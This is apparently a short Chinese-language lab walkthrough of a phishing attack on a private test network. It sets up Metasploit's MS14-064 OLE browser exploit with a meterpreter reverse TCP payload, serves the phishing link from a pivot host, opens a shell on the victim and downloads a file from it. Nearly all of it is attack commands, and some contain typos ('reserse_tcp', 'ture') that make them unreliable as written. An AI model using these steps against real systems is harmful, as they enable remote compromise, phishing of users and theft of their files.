0x0 确定攻击者IP、跳板机IP和受害者IP

192.168.88.130 //kail
192.168.88.138 //跳板机
192.168.88.139 //受害者

0x1 使用kail的metasploit生成钓鱼网站链接

msfconsole
use exploit/windows/browser/ms14_064_ole_code_execution
set payload windows/meterpreter/reserse_tcp
set lhost 192.168.88.130
set allowpowershellprompt ture //设置浏览器插件
exploit

0x2 将钓鱼网站链接放置在跳板机(服务器中)

0x3 受害者访问钓鱼链接

0x4 kail建立连接以及获取shell

sessions //查看会话
sessions -i 1 //获取shell

0x5 搜索可疑文件

0x6 下载可疑文件

download c:/lcy1.txt /root //meterpreter模式下